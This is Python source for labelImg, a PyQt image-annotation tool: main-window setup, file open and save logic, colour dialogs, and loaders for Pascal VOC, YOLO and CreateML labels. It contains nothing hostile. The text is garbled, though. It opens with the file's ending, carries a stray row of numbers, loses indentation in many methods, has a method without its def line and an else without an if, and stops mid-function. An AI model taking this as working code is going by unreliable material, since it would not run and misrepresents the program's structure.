        if self.autoSaving.isChecked():
            if self.defaultSaveDir is not None:
                if self.dirty is True:
                    self.saveFile()
            else:
                # Auto-save needs a target directory before it can proceed.
                self.changeSavedirDialog()
                return
        if not self.mayContinue():
            return
        if len(self.mImgList) <= 0:
            return
        filename = None
        if self.filePath is None:
            filename = self.mImgList[0]
        else:
            currIndex = self.mImgList.index(self.filePath)
            if currIndex + 1 < len(self.mImgList):
                filename = self.mImgList[currIndex + 1]
        if filename:
            self.loadFile(filename)
    def openFile(self, _value=False):
        """Show a file dialog and load the chosen image or label file."""
        if not self.mayContinue():
            return
        path = os.path.dirname(ustr(self.filePath)) if self.filePath else '.'
        formats = ['*.%s' % fmt.data().decode("ascii").lower() for fmt in QImageReader.supportedImageFormats()]
        filters = "Image & Label files (%s)" % ' '.join(formats + ['*%s' % LabelFile.suffix])
        filename = QFileDialog.getOpenFileName(self, '%s - Choose Image or Label file' % __appname__, path, filters)
        if filename:
            # PyQt5 returns (filename, selected_filter); PyQt4 a single value.
            if isinstance(filename, (tuple, list)):
                filename = filename[0]
            self.loadFile(filename)
    def saveFile(self, _value=False):
        """Save annotations next to the image, or into defaultSaveDir when set.

        Falls back to a save dialog when no label file exists yet.
        """
        if self.defaultSaveDir is not None and len(ustr(self.defaultSaveDir)):
            if self.filePath:
                imgFileName = os.path.basename(self.filePath)
                savedFileName = os.path.splitext(imgFileName)[0]
                savedPath = os.path.join(ustr(self.defaultSaveDir), savedFileName)
                self._saveFile(savedPath)
        else:
            imgFileDir = os.path.dirname(self.filePath)
            imgFileName = os.path.basename(self.filePath)
            savedFileName = os.path.splitext(imgFileName)[0]
            savedPath = os.path.join(imgFileDir, savedFileName)
            self._saveFile(savedPath if self.labelFile
                           else self.saveFileDialog(removeExt=False))
    def saveFileAs(self, _value=False):
        """Save annotations to a location chosen through a dialog."""
        assert not self.image.isNull(), "cannot save empty image"
        self._saveFile(self.saveFileDialog())
    def saveFileDialog(self, removeExt=True):
        """Run the save dialog and return the chosen path ('' on cancel).

        With removeExt=True the extension is stripped; saveLabels appends
        the format-appropriate one later.
        """
        caption = '%s - Choose File' % __appname__
        filters = 'File (*%s)' % LabelFile.suffix
        openDialogPath = self.currentPath()
        dlg = QFileDialog(self, caption, openDialogPath, filters)
        dlg.setDefaultSuffix(LabelFile.suffix[1:])
        dlg.setAcceptMode(QFileDialog.AcceptSave)
        filenameWithoutExtension = os.path.splitext(self.filePath)[0]
        dlg.selectFile(filenameWithoutExtension)
        dlg.setOption(QFileDialog.DontUseNativeDialog, False)
        if dlg.exec_():
            fullFilePath = ustr(dlg.selectedFiles()[0])
            if removeExt:
                return os.path.splitext(fullFilePath)[0]  # Return file path without the extension.
            else:
                return fullFilePath
        return ''
def _saveFile(self, annotationFilePath):
if annotationFilePath and self.saveLabels(annotationFilePath):
self.setClean()
self.statusBar().showMessage('Saved to %s' % annotationFilePath)
self.statusBar().show()
    def closeFile(self, _value=False):
        """Close the current image (after the unsaved-changes check)."""
        if not self.mayContinue():
            return
        self.resetState()
        self.setClean()
        self.toggleActions(False)
        self.canvas.setEnabled(False)
        self.actions.saveAs.setEnabled(False)
    def deleteImg(self):
        """Delete the current image file from disk and reload the directory.

        The next image is opened *before* deletion so the view never sits
        on a removed file.
        """
        deletePath = self.filePath
        if deletePath is not None:
            self.openNextImg()
            if os.path.exists(deletePath):
                os.remove(deletePath)
            self.importDirImages(self.lastOpenDir)
    def resetAll(self):
        """Wipe all saved settings and relaunch the application."""
        self.settings.reset()
        self.close()
        # Start a fresh detached process of this script, then let this one exit.
        proc = QProcess()
        proc.startDetached(os.path.abspath(__file__))
def mayContinue(self):
if not self.dirty:
return True
else:
discardChanges = self.discardChangesDialog()
if discardChanges == QMessageBox.No:
return True
elif discardChanges == QMessageBox.Yes:
self.saveFile()
return True
else:
return False
def discardChangesDialog(self):
yes, no, cancel = QMessageBox.Yes, QMessageBox.No, QMessageBox.Cancel
msg = u'You have unsaved changes, would you like to save them and proceed?\nClick "No" to undo all changes.'
return QMessageBox.warning(self, u'Attention', msg, yes | no | cancel)
def errorMessage(self, title, message):
return QMessageBox.critical(self, title,
'<p><b>%s</b></p>%s' % (title, message))
def currentPath(self):
return os.path.dirname(self.filePath) if self.filePath else '.'
    def chooseColor1(self):
        """Pick a new global line colour and apply it to future shapes."""
        color = self.colorDialog.getColor(self.lineColor, u'Choose line color',
                                          default=DEFAULT_LINE_COLOR)
        if color:
            self.lineColor = color
            # Shape.line_color is a class attribute: affects all new shapes.
            Shape.line_color = color
            self.canvas.setDrawingColor(color)
            self.canvas.update()
            self.setDirty()
    def deleteSelectedShape(self):
        """Delete the selected shape from canvas and label list."""
        self.remLabel(self.canvas.deleteSelected())
        self.setDirty()
        if self.noShapes():
            # No shapes left: disable shape-dependent actions.
            for action in self.actions.onShapesPresent:
                action.setEnabled(False)
    def chshapeLineColor(self):
        """Pick a new line colour for the selected shape only."""
        color = self.colorDialog.getColor(self.lineColor, u'Choose line color',
                                          default=DEFAULT_LINE_COLOR)
        if color:
            self.canvas.selectedShape.line_color = color
            self.canvas.update()
            self.setDirty()
    def chshapeFillColor(self):
        """Pick a new fill colour for the selected shape only."""
        color = self.colorDialog.getColor(self.fillColor, u'Choose fill color',
                                          default=DEFAULT_FILL_COLOR)
        if color:
            self.canvas.selectedShape.fill_color = color
            self.canvas.update()
            self.setDirty()
    def copyShape(self):
        """Finish a copy-drag on the canvas and register the new shape."""
        self.canvas.endMove(copy=True)
        self.addLabel(self.canvas.selectedShape)
        self.setDirty()
    def moveShape(self):
        """Finish a move-drag on the canvas and mark the document dirty."""
        self.canvas.endMove(copy=False)
        self.setDirty()
def loadPredefinedClasses(self, predefClassesFile):
if os.path.exists(predefClassesFile) is True:
with codecs.open(predefClassesFile, 'r', 'utf8') as f:
for line in f:
line = line.strip()
if self.labelHist is None:
self.labelHist = [line]
else:
self.labelHist.append(line)
    def loadPascalXMLByFilename(self, xmlPath):
        """Load Pascal VOC annotations from `xmlPath` onto the current image."""
        if self.filePath is None:
            return
        if os.path.isfile(xmlPath) is False:
            return
        # Switch the active format so subsequent saves match what was loaded.
        self.set_format(FORMAT_PASCALVOC)
        tVocParseReader = PascalVocReader(xmlPath)
        shapes = tVocParseReader.getShapes()
        self.loadLabels(shapes)
        self.canvas.verified = tVocParseReader.verified
def loadYOLOTXTByFilename(self, txtPath):
if self.filePath is None:
return
if os.path.isfile(txtPath) is False:
return
self.set_format(FORMAT_YOLO)
tYoloParseReader = YoloReader(txtPath, self.image)
shapes = tYoloParseReader.getShapes()
print (shapes)
self.loadLabels(shapes)
self.canvas.verified = tYoloParseReader.verified
    def loadCreateMLJSONByFilename(self, jsonPath, filePath):
        """Load CreateML annotations for `filePath` from the shared `jsonPath`."""
        if self.filePath is None:
            return
        if os.path.isfile(jsonPath) is False:
            return
        # Switch the active format so subsequent saves match what was loaded.
        self.set_format(FORMAT_CREATEML)
        crmlParseReader = CreateMLReader(jsonPath, filePath)
        shapes = crmlParseReader.get_shapes()
        self.loadLabels(shapes)
        self.canvas.verified = crmlParseReader.verified
    def copyPreviousBoundingBoxes(self):
        """Copy the previous image's annotations onto the current image and save.

        NOTE(review): `index()` raises ValueError if the current file is
        not in mImgList — assumed to always hold when this action fires.
        """
        currIndex = self.mImgList.index(self.filePath)
        if currIndex - 1 >= 0:
            prevFilePath = self.mImgList[currIndex - 1]
            self.showBoundingBoxFromAnnotationFile(prevFilePath)
            self.saveFile()
def togglePaintLabelsOption(self):
for shape in self.canvas.shapes:
shape.paintLabel = self.displayLabelOption.isChecked()
    def toogleDrawSquare(self):
        """Sync square-drawing mode with the menu option.

        NOTE(review): name keeps the historical 'toogle' typo because it is
        connected to a signal elsewhere; renaming would break callers.
        """
        self.canvas.setDrawingShapeToSquare(self.drawSquaresOption.isChecked())
def inverted(color):
    """Return the RGBA inverse of a QColor (each channel mapped to 255 - v)."""
    r, g, b, a = color.getRgb()
    return QColor(255 - r, 255 - g, 255 - b, 255 - a)
def read(filename, default=None):
    """Read an image file into a QImage, honouring EXIF orientation.

    Returns *default* when the file cannot be read.
    """
    try:
        reader = QImageReader(filename)
        # Apply EXIF rotation/mirroring automatically.
        reader.setAutoTransform(True)
        return reader.read()
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt / SystemExit
        # are no longer silently swallowed.
        return default
def get_main_app(argv=None):
    """
    Standard boilerplate Qt application code.
    Do everything but app.exec_() -- so that we can test the application in one thread
    """
    # `argv=None` replaces the mutable default `argv=[]` (shared-list pitfall);
    # passing an explicit list behaves exactly as before.
    if argv is None:
        argv = []
    app = QApplication(argv)
    app.setApplicationName(__appname__)
    app.setWindowIcon(newIcon("app"))
    # Tzutalin 201705+: Accept extra agruments to change predefined class file
    argparser = argparse.ArgumentParser()
    argparser.add_argument("image_dir", nargs="?")
    argparser.add_argument("predefined_classes_file",
                           default=os.path.join(os.path.dirname(__file__), "data", "predefined_classes.txt"),
                           nargs="?")
    argparser.add_argument("save_dir", nargs="?")
    args = argparser.parse_args(argv[1:])
    # Usage : labelImg.py image predefClassFile saveDir
    win = MainWindow(args.image_dir,
                     args.predefined_classes_file,
                     args.save_dir)
    win.show()
    return app, win
def main():
    """Construct the main application window and enter the Qt event loop."""
    # Keep a reference to the window so it is not garbage-collected
    # before exec_() returns.
    application, _window = get_main_app(sys.argv)
    return application.exec_()
# Script entry point: run the Qt app and propagate its exit status to the shell.
if __name__ == '__main__':
    sys.exit(main())
| 40.118707 | 169 | 0.6102 |
import argparse
import codecs
import distutils.spawn
import os.path
import platform
import re
import sys
import subprocess
from functools import partial
from collections import defaultdict
try:
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
except ImportError:
if sys.version_info.major >= 3:
import sip
sip.setapi('QVariant', 2)
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from combobox import ComboBox
from libs.resources import *
from libs.constants import *
from libs.utils import *
from libs.settings import Settings
from libs.shape import Shape, DEFAULT_LINE_COLOR, DEFAULT_FILL_COLOR
from libs.stringBundle import StringBundle
from libs.canvas import Canvas
from libs.zoomWidget import ZoomWidget
from libs.labelDialog import LabelDialog
from libs.colorDialog import ColorDialog
from libs.labelFile import LabelFile, LabelFileError, LabelFileFormat
from libs.toolBar import ToolBar
from libs.pascal_voc_io import PascalVocReader
from libs.pascal_voc_io import XML_EXT
from libs.yolo_io import YoloReader
from libs.yolo_io import TXT_EXT
from libs.create_ml_io import CreateMLReader
from libs.create_ml_io import JSON_EXT
from libs.ustr import ustr
from libs.hashableQListWidgetItem import HashableQListWidgetItem
# Application name used for the window title, settings, and status messages.
__appname__ = 'labelImg'
class WindowMixin(object):
    """Convenience helpers shared by windows: build menus and toolbars."""

    def menu(self, title, actions=None):
        """Add a menu named *title* to the menu bar, optionally with actions."""
        new_menu = self.menuBar().addMenu(title)
        if actions:
            addActions(new_menu, actions)
        return new_menu

    def toolbar(self, title, actions=None):
        """Create a left-docked toolbar named *title*, optionally with actions."""
        bar = ToolBar(title)
        bar.setObjectName(u'%sToolBar' % title)
        bar.setToolButtonStyle(Qt.ToolButtonTextUnderIcon)
        if actions:
            addActions(bar, actions)
        self.addToolBar(Qt.LeftToolBarArea, bar)
        return bar
class MainWindow(QMainWindow, WindowMixin):
FIT_WINDOW, FIT_WIDTH, MANUAL_ZOOM = list(range(3))
def __init__(self, defaultFilename=None, defaultPrefdefClassFile=None, defaultSaveDir=None):
super(MainWindow, self).__init__()
self.setWindowTitle(__appname__)
self.settings = Settings()
self.settings.load()
settings = self.settings
self.stringBundle = StringBundle.getBundle()
getStr = lambda strId: self.stringBundle.getString(strId)
self.defaultSaveDir = defaultSaveDir
self.labelFileFormat = settings.get(SETTING_LABEL_FILE_FORMAT, LabelFileFormat.PASCAL_VOC)
self.mImgList = []
self.dirname = None
self.labelHist = []
self.lastOpenDir = None
self.dirty = False
self._noSelectionSlot = False
self._beginner = True
self.screencastViewer = self.getAvailableScreencastViewer()
self.screencast = "https://youtu.be/p0nR2YsCY_U"
self.loadPredefinedClasses(defaultPrefdefClassFile)
self.labelDialog = LabelDialog(parent=self, listItem=self.labelHist)
self.itemsToShapes = {}
self.shapesToItems = {}
self.prevLabelText = ''
listLayout = QVBoxLayout()
listLayout.setContentsMargins(0, 0, 0, 0)
self.useDefaultLabelCheckbox = QCheckBox(getStr('useDefaultLabel'))
self.useDefaultLabelCheckbox.setChecked(False)
self.defaultLabelTextLine = QLineEdit()
useDefaultLabelQHBoxLayout = QHBoxLayout()
useDefaultLabelQHBoxLayout.addWidget(self.useDefaultLabelCheckbox)
useDefaultLabelQHBoxLayout.addWidget(self.defaultLabelTextLine)
useDefaultLabelContainer = QWidget()
useDefaultLabelContainer.setLayout(useDefaultLabelQHBoxLayout)
self.diffcButton = QCheckBox(getStr('useDifficult'))
self.diffcButton.setChecked(False)
self.diffcButton.stateChanged.connect(self.btnstate)
self.editButton = QToolButton()
self.editButton.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
listLayout.addWidget(self.editButton)
listLayout.addWidget(self.diffcButton)
listLayout.addWidget(useDefaultLabelContainer)
self.comboBox = ComboBox(self)
listLayout.addWidget(self.comboBox)
self.labelList = QListWidget()
labelListContainer = QWidget()
labelListContainer.setLayout(listLayout)
self.labelList.itemActivated.connect(self.labelSelectionChanged)
self.labelList.itemSelectionChanged.connect(self.labelSelectionChanged)
self.labelList.itemDoubleClicked.connect(self.editLabel)
self.labelList.itemChanged.connect(self.labelItemChanged)
listLayout.addWidget(self.labelList)
self.dock = QDockWidget(getStr('boxLabelText'), self)
self.dock.setObjectName(getStr('labels'))
self.dock.setWidget(labelListContainer)
self.fileListWidget = QListWidget()
self.fileListWidget.itemDoubleClicked.connect(self.fileitemDoubleClicked)
filelistLayout = QVBoxLayout()
filelistLayout.setContentsMargins(0, 0, 0, 0)
filelistLayout.addWidget(self.fileListWidget)
fileListContainer = QWidget()
fileListContainer.setLayout(filelistLayout)
self.filedock = QDockWidget(getStr('fileList'), self)
self.filedock.setObjectName(getStr('files'))
self.filedock.setWidget(fileListContainer)
self.zoomWidget = ZoomWidget()
self.colorDialog = ColorDialog(parent=self)
self.canvas = Canvas(parent=self)
self.canvas.zoomRequest.connect(self.zoomRequest)
self.canvas.setDrawingShapeToSquare(settings.get(SETTING_DRAW_SQUARE, False))
scroll = QScrollArea()
scroll.setWidget(self.canvas)
scroll.setWidgetResizable(True)
self.scrollBars = {
Qt.Vertical: scroll.verticalScrollBar(),
Qt.Horizontal: scroll.horizontalScrollBar()
}
self.scrollArea = scroll
self.canvas.scrollRequest.connect(self.scrollRequest)
self.canvas.newShape.connect(self.newShape)
self.canvas.shapeMoved.connect(self.setDirty)
self.canvas.selectionChanged.connect(self.shapeSelectionChanged)
self.canvas.drawingPolygon.connect(self.toggleDrawingSensitive)
self.setCentralWidget(scroll)
self.addDockWidget(Qt.RightDockWidgetArea, self.dock)
self.addDockWidget(Qt.RightDockWidgetArea, self.filedock)
self.filedock.setFeatures(QDockWidget.DockWidgetFloatable)
self.dockFeatures = QDockWidget.DockWidgetClosable | QDockWidget.DockWidgetFloatable
self.dock.setFeatures(self.dock.features() ^ self.dockFeatures)
action = partial(newAction, self)
quit = action(getStr('quit'), self.close,
'Ctrl+Q', 'quit', getStr('quitApp'))
open = action(getStr('openFile'), self.openFile,
'Ctrl+O', 'open', getStr('openFileDetail'))
opendir = action(getStr('openDir'), self.openDirDialog,
'Ctrl+u', 'open', getStr('openDir'))
copyPrevBounding = action(getStr('copyPrevBounding'), self.copyPreviousBoundingBoxes,
'Ctrl+v', 'paste', getStr('copyPrevBounding'))
changeSavedir = action(getStr('changeSaveDir'), self.changeSavedirDialog,
'Ctrl+r', 'open', getStr('changeSavedAnnotationDir'))
openAnnotation = action(getStr('openAnnotation'), self.openAnnotationDialog,
'Ctrl+Shift+O', 'open', getStr('openAnnotationDetail'))
openNextImg = action(getStr('nextImg'), self.openNextImg,
'd', 'next', getStr('nextImgDetail'))
openPrevImg = action(getStr('prevImg'), self.openPrevImg,
'a', 'prev', getStr('prevImgDetail'))
verify = action(getStr('verifyImg'), self.verifyImg,
'space', 'verify', getStr('verifyImgDetail'))
save = action(getStr('save'), self.saveFile,
'Ctrl+S', 'save', getStr('saveDetail'), enabled=False)
def getFormatMeta(format):
if format == LabelFileFormat.PASCAL_VOC:
return ('&PascalVOC', 'format_voc')
elif format == LabelFileFormat.YOLO:
return ('&YOLO', 'format_yolo')
elif format == LabelFileFormat.CREATE_ML:
return ('&CreateML', 'format_createml')
save_format = action(getFormatMeta(self.labelFileFormat)[0],
self.change_format, 'Ctrl+',
getFormatMeta(self.labelFileFormat)[1],
getStr('changeSaveFormat'), enabled=True)
saveAs = action(getStr('saveAs'), self.saveFileAs,
'Ctrl+Shift+S', 'save-as', getStr('saveAsDetail'), enabled=False)
close = action(getStr('closeCur'), self.closeFile, 'Ctrl+W', 'close', getStr('closeCurDetail'))
deleteImg = action(getStr('deleteImg'), self.deleteImg, 'Ctrl+Shift+D', 'close', getStr('deleteImgDetail'))
resetAll = action(getStr('resetAll'), self.resetAll, None, 'resetall', getStr('resetAllDetail'))
color1 = action(getStr('boxLineColor'), self.chooseColor1,
'Ctrl+L', 'color_line', getStr('boxLineColorDetail'))
createMode = action(getStr('crtBox'), self.setCreateMode,
'w', 'new', getStr('crtBoxDetail'), enabled=False)
editMode = action('&Edit\nRectBox', self.setEditMode,
'Ctrl+J', 'edit', u'Move and edit Boxs', enabled=False)
create = action(getStr('crtBox'), self.createShape,
'w', 'new', getStr('crtBoxDetail'), enabled=False)
delete = action(getStr('delBox'), self.deleteSelectedShape,
'Delete', 'delete', getStr('delBoxDetail'), enabled=False)
copy = action(getStr('dupBox'), self.copySelectedShape,
'Ctrl+D', 'copy', getStr('dupBoxDetail'),
enabled=False)
advancedMode = action(getStr('advancedMode'), self.toggleAdvancedMode,
'Ctrl+Shift+A', 'expert', getStr('advancedModeDetail'),
checkable=True)
hideAll = action('&Hide\nRectBox', partial(self.togglePolygons, False),
'Ctrl+H', 'hide', getStr('hideAllBoxDetail'),
enabled=False)
showAll = action('&Show\nRectBox', partial(self.togglePolygons, True),
'Ctrl+A', 'hide', getStr('showAllBoxDetail'),
enabled=False)
help = action(getStr('tutorial'), self.showTutorialDialog, None, 'help', getStr('tutorialDetail'))
showInfo = action(getStr('info'), self.showInfoDialog, None, 'help', getStr('info'))
zoom = QWidgetAction(self)
zoom.setDefaultWidget(self.zoomWidget)
self.zoomWidget.setWhatsThis(
u"Zoom in or out of the image. Also accessible with"
" %s and %s from the canvas." % (fmtShortcut("Ctrl+[-+]"),
fmtShortcut("Ctrl+Wheel")))
self.zoomWidget.setEnabled(False)
zoomIn = action(getStr('zoomin'), partial(self.addZoom, 10),
'Ctrl++', 'zoom-in', getStr('zoominDetail'), enabled=False)
zoomOut = action(getStr('zoomout'), partial(self.addZoom, -10),
'Ctrl+-', 'zoom-out', getStr('zoomoutDetail'), enabled=False)
zoomOrg = action(getStr('originalsize'), partial(self.setZoom, 100),
'Ctrl+=', 'zoom', getStr('originalsizeDetail'), enabled=False)
fitWindow = action(getStr('fitWin'), self.setFitWindow,
'Ctrl+F', 'fit-window', getStr('fitWinDetail'),
checkable=True, enabled=False)
fitWidth = action(getStr('fitWidth'), self.setFitWidth,
'Ctrl+Shift+F', 'fit-width', getStr('fitWidthDetail'),
checkable=True, enabled=False)
zoomActions = (self.zoomWidget, zoomIn, zoomOut,
zoomOrg, fitWindow, fitWidth)
self.zoomMode = self.MANUAL_ZOOM
self.scalers = {
self.FIT_WINDOW: self.scaleFitWindow,
self.FIT_WIDTH: self.scaleFitWidth,
self.MANUAL_ZOOM: lambda: 1,
}
edit = action(getStr('editLabel'), self.editLabel,
'Ctrl+E', 'edit', getStr('editLabelDetail'),
enabled=False)
self.editButton.setDefaultAction(edit)
shapeLineColor = action(getStr('shapeLineColor'), self.chshapeLineColor,
icon='color_line', tip=getStr('shapeLineColorDetail'),
enabled=False)
shapeFillColor = action(getStr('shapeFillColor'), self.chshapeFillColor,
icon='color', tip=getStr('shapeFillColorDetail'),
enabled=False)
labels = self.dock.toggleViewAction()
labels.setText(getStr('showHide'))
labels.setShortcut('Ctrl+Shift+L')
labelMenu = QMenu()
addActions(labelMenu, (edit, delete))
self.labelList.setContextMenuPolicy(Qt.CustomContextMenu)
self.labelList.customContextMenuRequested.connect(
self.popLabelListMenu)
self.drawSquaresOption = QAction('Draw Squares', self)
self.drawSquaresOption.setShortcut('Ctrl+Shift+R')
self.drawSquaresOption.setCheckable(True)
self.drawSquaresOption.setChecked(settings.get(SETTING_DRAW_SQUARE, False))
self.drawSquaresOption.triggered.connect(self.toogleDrawSquare)
self.actions = struct(save=save, save_format=save_format, saveAs=saveAs, open=open, close=close, resetAll = resetAll, deleteImg = deleteImg,
lineColor=color1, create=create, delete=delete, edit=edit, copy=copy,
createMode=createMode, editMode=editMode, advancedMode=advancedMode,
shapeLineColor=shapeLineColor, shapeFillColor=shapeFillColor,
zoom=zoom, zoomIn=zoomIn, zoomOut=zoomOut, zoomOrg=zoomOrg,
fitWindow=fitWindow, fitWidth=fitWidth,
zoomActions=zoomActions,
fileMenuActions=(
open, opendir, save, saveAs, close, resetAll, quit),
beginner=(), advanced=(),
editMenu=(edit, copy, delete,
None, color1, self.drawSquaresOption),
beginnerContext=(create, edit, copy, delete),
advancedContext=(createMode, editMode, edit, copy,
delete, shapeLineColor, shapeFillColor),
onLoadActive=(
close, create, createMode, editMode),
onShapesPresent=(saveAs, hideAll, showAll))
self.menus = struct(
file=self.menu('&File'),
edit=self.menu('&Edit'),
view=self.menu('&View'),
help=self.menu('&Help'),
recentFiles=QMenu('Open &Recent'),
labelList=labelMenu)
self.autoSaving = QAction(getStr('autoSaveMode'), self)
self.autoSaving.setCheckable(True)
self.autoSaving.setChecked(settings.get(SETTING_AUTO_SAVE, False))
self.singleClassMode = QAction(getStr('singleClsMode'), self)
self.singleClassMode.setShortcut("Ctrl+Shift+S")
self.singleClassMode.setCheckable(True)
self.singleClassMode.setChecked(settings.get(SETTING_SINGLE_CLASS, False))
self.lastLabel = None
self.displayLabelOption = QAction(getStr('displayLabel'), self)
self.displayLabelOption.setShortcut("Ctrl+Shift+P")
self.displayLabelOption.setCheckable(True)
self.displayLabelOption.setChecked(settings.get(SETTING_PAINT_LABEL, False))
self.displayLabelOption.triggered.connect(self.togglePaintLabelsOption)
addActions(self.menus.file,
(open, opendir, copyPrevBounding, changeSavedir, openAnnotation, self.menus.recentFiles, save, save_format, saveAs, close, resetAll, deleteImg, quit))
addActions(self.menus.help, (help, showInfo))
addActions(self.menus.view, (
self.autoSaving,
self.singleClassMode,
self.displayLabelOption,
labels, advancedMode, None,
hideAll, showAll, None,
zoomIn, zoomOut, zoomOrg, None,
fitWindow, fitWidth))
self.menus.file.aboutToShow.connect(self.updateFileMenu)
addActions(self.canvas.menus[0], self.actions.beginnerContext)
addActions(self.canvas.menus[1], (
action('&Copy here', self.copyShape),
action('&Move here', self.moveShape)))
self.tools = self.toolbar('Tools')
self.actions.beginner = (
open, opendir, changeSavedir, openNextImg, openPrevImg, verify, save, save_format, None, create, copy, delete, None,
zoomIn, zoom, zoomOut, fitWindow, fitWidth)
self.actions.advanced = (
open, opendir, changeSavedir, openNextImg, openPrevImg, save, save_format, None,
createMode, editMode, None,
hideAll, showAll)
self.statusBar().showMessage('%s started.' % __appname__)
self.statusBar().show()
self.image = QImage()
self.filePath = ustr(defaultFilename)
self.lastOpenDir= None
self.recentFiles = []
self.maxRecent = 7
self.lineColor = None
self.fillColor = None
self.zoom_level = 100
self.fit_window = False
self.difficult = False
recentFileQStringList = settings.get(SETTING_RECENT_FILES)
self.recentFiles = [ustr(i) for i in recentFileQStringList]
else:
self.recentFiles = recentFileQStringList = settings.get(SETTING_RECENT_FILES)
size = settings.get(SETTING_WIN_SIZE, QSize(600, 500))
position = QPoint(0, 0)
saved_position = settings.get(SETTING_WIN_POSE, position)
for i in range(QApplication.desktop().screenCount()):
if QApplication.desktop().availableGeometry(i).contains(saved_position):
position = saved_position
break
self.resize(size)
self.move(position)
saveDir = ustr(settings.get(SETTING_SAVE_DIR, None))
self.lastOpenDir = ustr(settings.get(SETTING_LAST_OPEN_DIR, None))
if self.defaultSaveDir is None and saveDir is not None and os.path.exists(saveDir):
self.defaultSaveDir = saveDir
self.statusBar().showMessage('%s started. Annotation will be saved to %s' %
(__appname__, self.defaultSaveDir))
self.statusBar().show()
self.restoreState(settings.get(SETTING_WIN_STATE, QByteArray()))
Shape.line_color = self.lineColor = QColor(settings.get(SETTING_LINE_COLOR, DEFAULT_LINE_COLOR))
Shape.fill_color = self.fillColor = QColor(settings.get(SETTING_FILL_COLOR, DEFAULT_FILL_COLOR))
self.canvas.setDrawingColor(self.lineColor)
Shape.difficult = self.difficult
def xbool(x):
if isinstance(x, QVariant):
return x.toBool()
return bool(x)
if xbool(settings.get(SETTING_ADVANCE_MODE, False)):
self.actions.advancedMode.setChecked(True)
self.toggleAdvancedMode()
self.updateFileMenu()
if self.filePath and os.path.isdir(self.filePath):
self.queueEvent(partial(self.importDirImages, self.filePath or ""))
elif self.filePath:
self.queueEvent(partial(self.loadFile, self.filePath or ""))
self.zoomWidget.valueChanged.connect(self.paintCanvas)
self.populateModeActions()
self.labelCoordinates = QLabel('')
self.statusBar().addPermanentWidget(self.labelCoordinates)
if self.filePath and os.path.isdir(self.filePath):
self.openDirDialog(dirpath=self.filePath, silent=True)
    def keyReleaseEvent(self, event):
        """Leave square-drawing mode when the Ctrl key is released."""
        if event.key() == Qt.Key_Control:
            self.canvas.setDrawingShapeToSquare(False)
    def keyPressEvent(self, event):
        """Constrain drawing to squares while the Ctrl key is held down."""
        if event.key() == Qt.Key_Control:
            self.canvas.setDrawingShapeToSquare(True)
save_format):
if save_format == FORMAT_PASCALVOC:
self.actions.save_format.setText(FORMAT_PASCALVOC)
self.actions.save_format.setIcon(newIcon("format_voc"))
self.labelFileFormat = LabelFileFormat.PASCAL_VOC
LabelFile.suffix = XML_EXT
elif save_format == FORMAT_YOLO:
self.actions.save_format.setText(FORMAT_YOLO)
self.actions.save_format.setIcon(newIcon("format_yolo"))
self.labelFileFormat = LabelFileFormat.YOLO
LabelFile.suffix = TXT_EXT
elif save_format == FORMAT_CREATEML:
self.actions.save_format.setText(FORMAT_CREATEML)
self.actions.save_format.setIcon(newIcon("format_createml"))
self.labelFileFormat = LabelFileFormat.CREATE_ML
LabelFile.suffix = JSON_EXT
def change_format(self):
if self.labelFileFormat == LabelFileFormat.PASCAL_VOC:
self.set_format(FORMAT_YOLO)
elif self.labelFileFormat == LabelFileFormat.YOLO:
self.set_format(FORMAT_CREATEML)
elif self.labelFileFormat == LabelFileFormat.CREATE_ML:
self.set_format(FORMAT_PASCALVOC)
else:
raise ValueError('Unknown label file format.')
self.setDirty()
    def noShapes(self):
        """Return True when no shapes are registered for the current image."""
        return not self.itemsToShapes
    def toggleAdvancedMode(self, value=True):
        """Switch between beginner (value False) and advanced (value True) UI."""
        self._beginner = not value
        self.canvas.setEditing(True)
        self.populateModeActions()
        self.editButton.setVisible(not value)
        if value:
            self.actions.createMode.setEnabled(True)
            self.actions.editMode.setEnabled(False)
            # XOR toggles the closable/floatable features on.
            self.dock.setFeatures(self.dock.features() | self.dockFeatures)
        else:
            self.dock.setFeatures(self.dock.features() ^ self.dockFeatures)
    def populateModeActions(self):
        """Rebuild the toolbar, canvas context menu, and Edit menu for the mode."""
        if self.beginner():
            tool, menu = self.actions.beginner, self.actions.beginnerContext
        else:
            tool, menu = self.actions.advanced, self.actions.advancedContext
        self.tools.clear()
        addActions(self.tools, tool)
        self.canvas.menus[0].clear()
        addActions(self.canvas.menus[0], menu)
        self.menus.edit.clear()
        actions = (self.actions.create,) if self.beginner()\
            else (self.actions.createMode, self.actions.editMode)
        addActions(self.menus.edit, actions + self.actions.editMenu)
    def setBeginner(self):
        """Show the beginner-mode toolbar actions."""
        self.tools.clear()
        addActions(self.tools, self.actions.beginner)
    def setAdvanced(self):
        """Show the advanced-mode toolbar actions."""
        self.tools.clear()
        addActions(self.tools, self.actions.advanced)
    def setDirty(self):
        """Mark the current image as having unsaved changes; enable Save."""
        self.dirty = True
        self.actions.save.setEnabled(True)
    def setClean(self):
        """Mark the current image as saved; disable Save, re-enable Create."""
        self.dirty = False
        self.actions.save.setEnabled(False)
        self.actions.create.setEnabled(True)
def toggleActions(self, value=True):
for z in self.actions.zoomActions:
z.setEnabled(value)
for action in self.actions.onLoadActive:
action.setEnabled(value)
    def queueEvent(self, function):
        """Run *function* on the Qt event loop as soon as it is idle."""
        QTimer.singleShot(0, function)
    def status(self, message, delay=5000):
        """Show *message* in the status bar for *delay* milliseconds."""
        self.statusBar().showMessage(message, delay)
    def resetState(self):
        """Clear all per-image state before loading a new file."""
        self.itemsToShapes.clear()
        self.shapesToItems.clear()
        self.labelList.clear()
        self.filePath = None
        self.imageData = None
        self.labelFile = None
        self.canvas.resetState()
        self.labelCoordinates.clear()
        self.comboBox.cb.clear()
def currentItem(self):
items = self.labelList.selectedItems()
if items:
return items[0]
return None
    def addRecentFile(self, filePath):
        """Move *filePath* to the front of the recent-files list (max 7 kept)."""
        if filePath in self.recentFiles:
            self.recentFiles.remove(filePath)
        elif len(self.recentFiles) >= self.maxRecent:
            # List is full and the path is new: drop the oldest entry.
            self.recentFiles.pop()
        self.recentFiles.insert(0, filePath)
    def beginner(self):
        """Return True while the UI is in beginner mode."""
        return self._beginner
    def advanced(self):
        """Return True while the UI is in advanced mode."""
        return not self.beginner()
def getAvailableScreencastViewer(self):
osName = platform.system()
if osName == 'Windows':
